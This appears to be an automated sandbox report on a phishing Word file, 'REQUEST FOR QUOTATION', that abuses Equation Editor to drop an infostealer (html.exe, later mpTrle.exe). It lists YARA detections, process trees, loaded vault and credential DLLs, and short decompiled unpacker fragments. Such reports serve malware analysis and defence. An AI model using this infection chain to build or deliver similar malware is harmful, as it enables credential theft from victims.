OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48255FE9.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: html[1].exe.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: html.exe.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 9.2.html.exe.330000.0.raw.unpack, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.html.exe.330000.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.html.exe.330000.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.html.exe.4f0000.2.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.html.exe.4f0000.2.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.html.exe.3b55730.9.raw.unpack, cPs8D.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.html.exe.3b55730.9.raw.unpack, 72CF8egH.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.html.exe.3b55730.9.raw.unpack, G5CXsdn.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.html.exe.3b55730.9.raw.unpack, 3uPsILA6U.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 9.2.html.exe.5e60000.12.raw.unpack, SKNwGsNRwam5llK5t6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, SKNwGsNRwam5llK5t6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9.2.html.exe.5e60000.12.raw.unpack, sqh1bsK2vmbKu3bQAB.cs	Security API names: _0020.SetAccessControl
Source: 9.2.html.exe.5e60000.12.raw.unpack, sqh1bsK2vmbKu3bQAB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9.2.html.exe.5e60000.12.raw.unpack, sqh1bsK2vmbKu3bQAB.cs	Security API names: _0020.AddAccessRule
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, sqh1bsK2vmbKu3bQAB.cs	Security API names: _0020.SetAccessControl
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, sqh1bsK2vmbKu3bQAB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, sqh1bsK2vmbKu3bQAB.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@27/33@11/5

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$QUEST FOR QUOTATION.docx.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Mutant created: \Sessions\1\BaseNamedObjects\hjnXhvOmXexOicqL
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR65B4.tmp

Jump to behavior

Source: REQUEST FOR QUOTATION.docx.doc	OLE indicator, Word Document stream: true
Source: REQUEST FOR QUOTATION.docx.doc	OLE indicator, Word Document stream: true
Source: REQUEST FOR QUOTATION.docx.doc	OLE indicator, Word Document stream: true
Source: REQUEST FOR QUOTATION.docx.doc	OLE indicator, Word Document stream: true
Source: REQUEST FOR QUOTATION.docx.doc	OLE indicator, Word Document stream: true
Source: REQUEST FOR QUOTATION.docx.doc	OLE indicator, Word Document stream: true
Source: REQUEST FOR QUOTATION.docx.doc	OLE indicator, Word Document stream: true

Source: REQUEST FOR QUOTATION.docx.doc	OLE document summary: title field not present or empty
Source: REQUEST FOR QUOTATION.docx.doc	OLE document summary: title field not present or empty
Source: REQUEST FOR QUOTATION.docx.doc	OLE document summary: title field not present or empty
Source: REQUEST FOR QUOTATION.docx.doc	OLE document summary: title field not present or empty
Source: REQUEST FOR QUOTATION.docx.doc	OLE document summary: title field not present or empty
Source: REQUEST FOR QUOTATION.docx.doc	OLE document summary: title field not present or empty
Source: REQUEST FOR QUOTATION.docx.doc	OLE document summary: title field not present or empty
Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Users\user\AppData\Roaming\html.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: REQUEST FOR QUOTATION.docx.doc

Virustotal: Detection: 9%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\html.exe "C:\Users\user\AppData\Roaming\html.exe"
Source: C:\Users\user\AppData\Roaming\html.exe	Process created: C:\Users\user\AppData\Roaming\html.exe "C:\Users\user\AppData\Roaming\html.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\html.exe "C:\Users\user\AppData\Roaming\html.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process created: C:\Users\user\AppData\Roaming\html.exe "C:\Users\user\AppData\Roaming\html.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: wbemcomn2.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: ntdsapi.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: credssp.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Section loaded: vaultcli.dll

Source: C:\Users\user\AppData\Roaming\html.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: REQUEST FOR QUOTATION.docx.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\REQUEST FOR QUOTATION.docx.doc

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\html.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: REQUEST FOR QUOTATION.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject7.bin
Source: REQUEST FOR QUOTATION.docx.doc	Initial sample: OLE zip file path = word/media/image2.emf
Source: REQUEST FOR QUOTATION.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject5.bin
Source: REQUEST FOR QUOTATION.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject6.bin
Source: REQUEST FOR QUOTATION.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject3.bin
Source: REQUEST FOR QUOTATION.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject4.bin
Source: REQUEST FOR QUOTATION.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: REQUEST FOR QUOTATION.docx.doc	Initial sample: OLE zip file path = word/_rels/settings.xml.rels

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: lGeIZ.pdbSHA256) source: EQNEDT32.EXE, 00000008.00000003.379830677.000000000A7E1000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe.10.dr, html.exe.8.dr, html[1].exe.8.dr
Source:	Binary string: lGeIZ.pdb source: EQNEDT32.EXE, 00000008.00000003.379830677.000000000A7E1000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe.10.dr, html.exe.8.dr, html[1].exe.8.dr

Source: REQUEST FOR QUOTATION.docx.doc

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 9.2.html.exe.4f0000.2.raw.unpack, XG.cs	.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 9.2.html.exe.28cf3d0.6.raw.unpack, XG.cs	.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})

.NET source code contains potential unpacker

Source: 9.2.html.exe.330000.0.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 9.2.html.exe.5e60000.12.raw.unpack, sqh1bsK2vmbKu3bQAB.cs	.Net Code: JQN64AOHtZ System.Reflection.Assembly.Load(byte[])
Source: 9.2.html.exe.3889550.8.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
